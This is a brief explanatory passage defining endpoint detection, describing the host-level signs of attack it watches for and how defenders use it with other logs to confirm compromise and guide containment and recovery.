Endpoint detection is security monitoring on devices such as laptops, servers, and workstations to find suspicious behavior, malware activity, and signs of intrusion. It focuses on the endpoint itself, where attackers often run tools, create persistence, steal credentials, or launch ransomware.
This matters because many attacks leave evidence on the host before they are visible elsewhere: unusual process launches, encoded PowerShell, file encryption patterns, privilege escalation, or connections to known command-and-control infrastructure. Endpoint detection tools can alert analysts, isolate a device, or preserve forensic data for investigation. In real defenses, it is used alongside logs from VPNs, email, and servers to confirm whether a public threat claim reflects actual compromise or only pressure tactics. Good endpoint detection helps responders move from speculation to evidence-based action, including containment, credential resets, and recovery from clean backups.